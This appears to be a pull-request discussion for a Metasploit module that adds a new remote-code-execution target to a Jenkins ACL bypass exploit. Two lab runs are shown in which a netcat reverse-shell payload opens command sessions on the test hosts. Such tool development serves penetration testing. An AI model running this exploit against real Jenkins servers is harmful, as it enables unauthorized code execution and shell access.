Add newer RCE vector to Jenkins ACL bypass exploit

[wvu]

msf5 exploit(multi/http/jenkins_metaprogramming) > options

Module options (exploit/multi/http/jenkins_metaprogramming):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     172.28.128.3     yes       The target address range or CIDR identifier
   RPORT      8080             yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /jenkins         yes       Base path to Jenkins
   VHOST                       no        HTTP server virtual host


Payload options (cmd/unix/reverse_netcat):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  172.28.128.1     yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Unix In-Memory


msf5 exploit(multi/http/jenkins_metaprogramming) > run

[*] Started reverse TCP handler on 172.28.128.1:4444
[*] Jenkins 2.137 detected
[+] Jenkins 2.137 is a supported target
[+] ACL bypass successful
[*] Configuring Unix In-Memory target
[*] Sending Jenkins and Groovy go-go-gadgets
[*] Command shell session 1 opened (172.28.128.1:4444 -> 172.28.128.3:45020) at 2019-05-21 15:13:26 -0500

id
uid=112(tomcat8) gid=117(tomcat8) groups=117(tomcat8)
uname -a
Linux ubuntu-xenial 4.4.0-141-generic #167-Ubuntu SMP Wed Dec 5 10:40:15 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux

#11466

[jrobles-r7]

@wvu-r7 LGTM. I did run into the Mdm::Workspace issue that you mentioned previously when using the Java Dropper but that is a separate issue from these changes.

msf5 exploit(multi/http/jenkins_metaprogramming) > exploit

[*] Started reverse TCP handler on 172.22.222.136:8443 
[*] Configuring Unix In-Memory target
[*] Sending Jenkins and Groovy go-go-gadgets
[*] Command shell session 1 opened (172.22.222.136:8443 -> 172.22.222.112:41071) at 2019-05-23 06:24:17 -0500

uname -a
Linux 8ac8c4e5a351 4.18.0-15-generic #16~18.04.1-Ubuntu SMP Thu Feb 7 14:06:04 UTC 2019 x86_64 GNU/Linux
whoami
jenkins

[jrobles-r7]

Release Notes

This updates the jenkins_metaprogramming exploit module with an additional target that uses the GroovyShell.parse entry point for command execution.

[wvu]

Awesome, thanks!

[wvu]

Failure to stage Java Meterpreter fixed in #11871.